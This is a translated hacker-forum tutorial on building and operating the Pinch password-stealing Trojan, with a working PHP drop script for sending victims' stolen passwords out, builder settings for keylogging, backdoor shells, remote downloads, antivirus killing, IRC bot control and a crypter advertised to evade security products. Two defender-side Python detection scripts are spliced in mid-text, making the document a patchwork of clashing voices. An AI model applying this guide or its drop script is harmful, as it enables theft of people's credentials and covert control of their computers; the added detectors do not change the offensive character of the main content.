
Breaking into mail; using BrutusAET2


MATERIAL IS POSTED FOR INFORMATIONAL PURPOSES. THE AUTHOR BEARS NO RESPONSIBILITY FOR ANY CONSEQUENCES


------------------------------------------------------------------
Part 1. Old, but useful: for Pinch 1

***********************
Pinch 1.0 instructions
***********************

=====
Intro
=====

Do not be surprised that I decided to write an article like this (an article for lamers). The fact is that on my forum (http://forum.web-hack.ru) a thread appears roughly every three days along the lines of "How do I set up and use Pinch correctly?", "How do I use Pinch?" and so on.

===========
Capabilities
===========

This Trojan was quite widespread in 2003/2004, thanks to its ability to steal a large number of passwords (ICQ99b-2003a/Lite/ICQ2003Pro, Miranda IM, Trillian ICQ & AIM, &RQ, The Bat!, The Bat! 2, Outlook/Outlook Express, IE autocomplete & protected sites & ftp (9x/ME/2000/XP), FAR Manager (ftp), Win/Total Commander (ftp), RAS (9x/Me/2k/xp supported)), its small size, its open source, and the ease of building a Trojan for a specific task. The Trojan has the following features:

- Sends the victim's computer configuration: OS, RAM, CPU, HDD, logged-in user, host name, IP
- Keylogger (Key-log)
- Remote console (Remote console)
- Bypasses the firewall
- Sends all passwords by e-mail through an SMTP server
- Encrypts the stolen passwords that are sent by mail
- Deletes itself after launch
- HTML/text reports
- File size of about 10 KB
- Modular system
- And much more...

The Trojan was written by coban2k (http://www.cobans.net), a fairly well-known figure in the world of ICQ hacking. Because of problems with his hosting provider over storing the Trojan on their server, the author was forced to remove this creation from his site. Unfortunately, almost all antiviruses detect this Trojan, so it can only be sent to a victim who has no antivirus.

============
Equipment
============

The archive (pinch_1.0.zip) with the Trojan includes the following folders and files:

\PinchBuilder.exe - Trojan wizard (builder)
\Parser.exe - a program that decrypts the encrypted letters with passwords
\readme.txt - no comments
\Pinch\ - main folder with the Trojan's asm source and compiler
\Sources\ - other sources
\TB! 2 Plugin (Auto-parser)\ - a folder with a plugin for The Bat! 2 that decodes the encrypted e-mails with passwords arriving in your inbox
\Sources\Script\ - the PHP script through which passwords are sent when the corresponding option is selected at compile time (see below)

================
Compile troy
================

The package includes a special wizard (PinchBuilder.exe) that creates the Trojan according to your requirements and compiles it right on your computer. The program has two main tabs: Compile and Decrypt. The first serves to create the Trojan, the second to decrypt passwords (this tab is in fact the same thing as Parser.exe). Then come three sub-tabs: SMTP, HTTP and FILE. They set how the passwords are delivered. Let us look at each in more detail:

========
SMTP
========

In the Server field enter the address (hostname/IP) of the SMTP server. If you entered a domain name, click Resolve so that it is converted to an IP address. Next, in the From and To fields, enter your e-mail address. The Send test message button sends a test letter using the settings you specified. I strongly recommend using it. If the letter does not arrive, there is some problem with sending (firewall enabled, bad SMTP server, you did not click Resolve, etc.).

I want to note that lately most providers are switching to a setup where their customers can send e-mail ONLY through THEIR OWN SMTP server. In such cases, I recommend sending the e-mails via HTTP.

====
HTTP
====

Upload the \Sources\Script\view.php file to a server that supports PHP scripts and allows the mail() function. Then, in the URL field, enter the path to this script (for example, http://www.xss.ru/pinch.php). In the Subject field enter the subject line with which the letters will be sent. The Status check str field must contain the string that the script outputs after it is loaded. In the script that ships with the Trojan, this value is _ret_ok_1:

<script language="JavaScript">
window.status = "_ret_ok_1";
</script>

If the Trojan does not receive this value, it will keep trying to send the e-mail through this script every minute until it gets the response specified in the Status check str field. I recommend using not the script from the standard package but the one I wrote:

<html><body>
<?php
// Author: Terabyte (http://www.web-hack.ru)
$email = $_POST['a'];
$subject = $_POST['b'];
$msg = $_POST['c'];
if (isset($email) and isset($subject) and isset($msg)) {
    mail($email, $subject, $msg, "From: $email");
}
?>
<script language="JavaScript">
window.status = "_ret_ok_1";
</script>
</body></html>

It does almost the same thing, but is written more competently. A huge advantage of this method of sending passwords is that it lets them pass the firewall. How is this achieved? Here is an excerpt from the Outpost log when a password was sent through the script on my site:

Process name: iexplorer.exe
Protocol: HTTP
Remote address: www.web-hack.ru

I think everyone who is not in a tank understood =) Among the other pluses I can point out: the ability to store the encrypted e-mails on your site rather than sending them to a mailbox; the ability to change the mailbox to which passwords are sent, in case it gets deleted; and, during mass distribution of the Trojan, passwords can be sent even from providers where access to every SMTP server except their own is blocked.
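From the defender's side, the two delivery paths described above (the SMTP tab, and the HTTP drop script) leave distinct traces in an egress log: port 25 connections that do not go to the provider's own relay or do not come from a mail client, and a POST of form fields named a, b and c to a PHP script. The Outpost excerpt above also shows a process named "iexplorer.exe"; the genuine Internet Explorer binary is iexplore.exe, so that one-letter difference is itself an indicator. The following script is an added example, not code from the article or from Pinch. The log format, the sample lines, the approved-relay list and the mail-client list are all constructed assumptions for the example.

```python
"""Defender-side checks for the two exfiltration paths the article describes:
mail sent to an arbitrary SMTP relay, and an HTTP POST to a PHP drop script
made by a process whose name mimics Internet Explorer.

Added example, not part of Pinch or of the article. The log format below is a
constructed one (process, protocol, remote host, port, method, path, form
field names); the approved-relay and mail-client lists are assumptions.
"""
import re
from dataclasses import dataclass

# Constructed sample egress log. Line 2 mirrors the article's Outpost excerpt:
# "iexplorer.exe" differs by one letter from the real browser binary, iexplore.exe.
SAMPLE_LOG = """\
iexplore.exe TCP www.example.com 80 GET /index.html -
iexplorer.exe TCP www.example.net 80 POST /pinch.php a,b,c
thebat.exe TCP smtp.mail.ru 25 - - -
svchost.exe TCP 203.0.113.7 25 - - -
outlook.exe TCP 203.0.113.7 25 - - -
"""

APPROVED_SMTP_RELAYS = {"smtp.mail.ru"}                    # assumption: the provider's own relay
MAIL_CLIENTS = {"thebat.exe", "outlook.exe", "msimn.exe"}  # assumption: sanctioned mail senders
REAL_BROWSER_NAMES = {"iexplore.exe"}
DROP_SCRIPT_FIELDS = {"a", "b", "c"}                       # field names used by the article's view.php


@dataclass(frozen=True)
class Finding:
    line_no: int
    process: str
    reason: str


def looks_like_browser_masquerade(process: str) -> bool:
    """True for 'iexplore' plus a short suffix (iexplorer.exe, iexplore32.exe),
    never for the genuine iexplore.exe."""
    name = process.lower()
    if name in REAL_BROWSER_NAMES:
        return False
    return re.fullmatch(r"iexplore\w{1,3}\.exe", name) is not None


def check_line(line_no: int, line: str) -> list:
    """Apply all three indicators to one log line; a line can yield several findings."""
    process, _proto, host, port, method, path, fields = line.split()
    port = int(port)
    findings = []
    if looks_like_browser_masquerade(process):
        findings.append(Finding(line_no, process, "process name mimics Internet Explorer"))
    if port == 25:
        if host not in APPROVED_SMTP_RELAYS:
            findings.append(Finding(line_no, process, f"SMTP to non-approved relay {host}"))
        if process.lower() not in MAIL_CLIENTS:
            findings.append(Finding(line_no, process, "SMTP from a non-mail-client process"))
    if method == "POST" and path.endswith(".php") and set(fields.split(",")) == DROP_SCRIPT_FIELDS:
        findings.append(Finding(line_no, process, "POST of fields a,b,c to a PHP script (drop-script pattern)"))
    return findings


def check_log(text: str) -> list:
    """Run check_line over every non-empty line of the log."""
    findings = []
    for line_no, line in enumerate(text.splitlines(), start=1):
        if line.strip():
            findings.extend(check_line(line_no, line))
    return findings


if __name__ == "__main__":
    for f in check_log(SAMPLE_LOG):
        print(f"line {f.line_no}: {f.process}: {f.reason}")
```

On the sample, the masqueraded browser line yields two findings (the name and the drop-script POST), the svchost.exe line two (unapproved relay and non-mail-client sender), and the outlook.exe line one (unapproved relay); the genuine browser and the mail client talking to the provider's relay produce nothing. The field-name check is deliberately exact, since the page's script reads exactly a, b and c; a real deployment would also want the request body size and the response marker string.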

====
FILE
====

This tab sets the path to the file in which all passwords are saved. To do this, write the path to the file in the Path field (for example, C:\password.txt).

================
Compiler Options
================

Everything here is clear: you just tick the boxes you need. It is worth paying attention to the Add Icon field. It specifies the path to the icon with which the compiled Trojan will be displayed. I want to note that on my system (Windows XP) I was not able to compile the Trojan with this option enabled and had to disable it.

In the Protocol field, specify the method by which the passwords will be sent (SMTP/HTTP/FILE). Next, click the Compile button and the Trojan should compile; it will be saved to the main folder with the wizard that created it.

===================
Password decryption
===================

Suppose you managed to slip this Trojan to a lamer and the passwords from the victim's machine arrived in your mailbox. When the passwords are sent they are encrypted and must first be decrypted (unless you have the special plugin for The Bat! described above). Copy the text with the encoded passwords to the clipboard, open Parser.exe (or the Decrypt tab in PinchBuilder.exe) and click Process Data in the context menu (or simply press Alt+C). The program will then present all the data stolen from the victim in a convenient form. You can then save or print it.

==========
Conclusion
==========

I want to warn you that by using this Trojan you immediately fall under Article 273 of the Criminal Code and can be seriously punished ;-) I (the author of the article) bear no responsibility for any harm that may be caused to anyone after reading my article.


----------------------------------------

Part 2. Instructions for Pinch 2.58

A short article on the basic settings of Pinch. Do not judge too strictly, but criticize at full length. An article on setting up Pinch 2.58.

I think there is no problem with the crack; there is no detailed help, and a video is even attached. I want to show how to set things up in the Builder:

SMTP Properties
Server (enter, in your case, smtp.mail.ru), then you must click Resolve to convert it to an IP (by the way, all these manipulations must be performed while connected to the Internet)

Port - leave it as it is

Protocol - the choice of how the report will be received: via SMTP, via HTTP (through PHP), or FILE (saved on the computer). The buttons with the same names (SMTP, HTTP, FILE) configure each protocol, but in this case we are interested in SMTP, and we have already configured it.

TestSend button - sends a test message to the mailbox.

PWD tab - collects passwords from the listed programs. If the ENABLE PWD checkbox is cleared, reports will not contain passwords.
The Don't send old report checkbox - do not send old reports.
The Encrypt and Packing checkboxes are interrelated. FSG, UPX, MEW - choice of packer.

RUN tab - selects the startup method. I think you will figure it out. The "as ...." drop-down: standart, DLL, Undelate Service. "Move to a folder .....": either you specify one or you pick one of the system folders. The Values column on the right I did not touch, and honestly I have only a vague idea what it is for. Bottom right - bypass Windows Firewall (SP2) - bypasses the system firewall in SP2 (as far as I know, the mechanism of this item is that it starts as iexplorer.exe)

The SPY tab - some additional reports; it did not work for me. The Screen spy feature takes a screenshot, but again it did not work for me (the screenshot was sent, but it was empty)

NET tab - I did not use it. It is intended to:
1. Open any port on the infected computer and accordingly get access to it (I strongly advise against using it unless you encrypt it; if you get caught, you can guess what will happen...)
2. Downloader - specify a direct link to any file that should be downloaded and run (imagine the expenses your enemy will incur if he pays for traffic......)))))
3. AutoUpdate - on finishing its work, the Trojan downloads a copy of itself and then deletes itself; at the next system boot the new copy is launched (this is for greater reliability, so that it is not found).

BD (backdoor) tab - the console opens a shell on the selected port, controlled via telnet (telnet.exe) or alternative programs. (I haven't tried it myself)

The ECT tab - binding to any file, as well as setting the icon... You can also have a message pop up... But something does not work...

The KILL tab - killing some process (you can try killing the antivirus), for example "spidernt", after which the DrWeb monitor turns off (I warn you, I haven't done it yet, but I will try)

IE tab - sets your own start page in the browser. Adds a page to Favorites....

WORM tab - what this is, I don't know......

IRC-bot tab - access to the computer through IRC:
.login - authorization
.die - bot shutdown
.download - download a file from a URL
.httpd - open file access via HTTP on a specific port
.killthread - terminate a specific task
.proxy - open a socks4 proxy on the selected port with the selected id
.raw - send raw text to this IRC server
.remove - self-deletion
.restart - restart
.run - run commands
.scan - scan IP addresses for specific open ports
.shell - open a shell on a specific port (not 95/98/ME)
.status - show version, IP, launch date
.threads - show active tasks
.update - self-update the bot from a special URL
.visit - visit the selected URL hidden
.url - visit the selected URL openly
.link - add to favorites
.sp - set the home page
.msg - message (messagebox)
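For anyone watching IRC traffic, the command vocabulary above is a usable signature: a nick that issues several distinct dot-commands from this list is behaving like a controller, while a single colliding word in ordinary chat should not trigger. The script below is an added example, not code from the article or from Pinch; the IRC lines are a constructed sample, and the command set is copied from the list above.

```python
"""Flag IRC senders that use the bot command vocabulary listed in the article.

Added example, not part of Pinch or of the article. The IRC lines are a
constructed sample; the command set is copied from the article's list.
"""
import re
from typing import Optional

BOT_COMMANDS = {
    ".login", ".die", ".download", ".httpd", ".killthread", ".proxy", ".raw",
    ".remove", ".restart", ".run", ".scan", ".shell", ".status", ".threads",
    ".update", ".visit", ".url", ".link", ".sp", ".msg",
}

# :nick!user@host PRIVMSG target :text   (the !user@host part may be absent)
PRIVMSG_RE = re.compile(r"^:(?P<nick>[^!\s]+)(?:!\S+)? PRIVMSG (?P<target>\S+) :(?P<text>.*)$")

# Constructed sample: 'ops' issues three commands, 'alice' chats (and mentions
# ".sp" mid-sentence), 'bob' sends one command, and a PING is not a PRIVMSG at all.
SAMPLE_IRC = """\
:ops!ops@198.51.100.9 PRIVMSG #chan :.login s3cret
:alice!a@example.org PRIVMSG #chan :hello everyone, .sp is my favourite album
:ops!ops@198.51.100.9 PRIVMSG #chan :.scan 203.0.113.0/24 445
:ops!ops@198.51.100.9 PRIVMSG #chan :.shell 4444
PING :irc.example.net
:bob!b@example.org PRIVMSG #chan :.status
"""


def bot_command(text: str) -> Optional[str]:
    """Return the bot command if the message starts with one, else None.
    Only the first token counts, so a command word mid-sentence is ignored."""
    tokens = text.split(maxsplit=1)
    if not tokens:
        return None
    first = tokens[0].lower()
    return first if first in BOT_COMMANDS else None


def commands_by_sender(text: str) -> dict:
    """Map each nick to the bot commands it sent, in order of appearance."""
    seen = {}
    for line in text.splitlines():
        m = PRIVMSG_RE.match(line)
        if not m:
            continue  # PING, JOIN, numerics and anything else that is not a PRIVMSG
        cmd = bot_command(m.group("text"))
        if cmd:
            seen.setdefault(m.group("nick"), []).append(cmd)
    return seen


def suspected_controllers(text: str, min_distinct: int = 2) -> list:
    """Nicks that issued at least `min_distinct` different bot commands.
    The threshold keeps a single colliding word from ordinary chat below the bar."""
    by_sender = commands_by_sender(text)
    return sorted(nick for nick, cmds in by_sender.items() if len(set(cmds)) >= min_distinct)


if __name__ == "__main__":
    for nick in suspected_controllers(SAMPLE_IRC):
        print(nick, commands_by_sender(SAMPLE_IRC)[nick])
```

On the sample only "ops" crosses the threshold; "bob" sent one command and "alice" none, since ".sp" appeared mid-sentence. Raising min_distinct or requiring commands over a time window are the natural next tuning knobs for a noisy channel.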

That seems to be all.... You press COMPILE and the Trojan appears in the folder with the builder...

GOOD LUCK !!!!!

PS: All of this is written for review only, and the author is not responsible for the consequences...



~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Crypt features:
Uses a polymorphic cryptor
Bypasses KIS and Outpost (including the latest versions)
Self-removal
Reduced size (a normal Pinch is reduced by 3-6 KB, a zupacha loader by 60-80 KB)

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~